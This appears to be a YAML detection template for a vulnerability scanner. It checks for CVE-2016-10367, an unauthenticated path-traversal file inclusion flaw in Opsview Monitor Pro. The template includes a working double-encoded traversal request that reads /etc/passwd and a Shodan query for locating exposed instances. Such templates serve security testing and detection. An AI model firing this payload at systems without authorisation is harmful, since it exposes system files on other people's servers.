39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: CVE-2016-10367
|
|
|
|
info:
|
|
name: Opsview Monitor Pro - Local File Inclusion
|
|
author: 0x_akoko
|
|
severity: high
|
|
description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.
|
|
reference:
|
|
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
|
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10367
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2016-10367
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
shodan-query: title:"Opsview"
|
|
verified: "true"
|
|
tags: cve,cve2016,opsview,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 404
|
|
|
|
# Enhanced by mp on 2022/08/03
|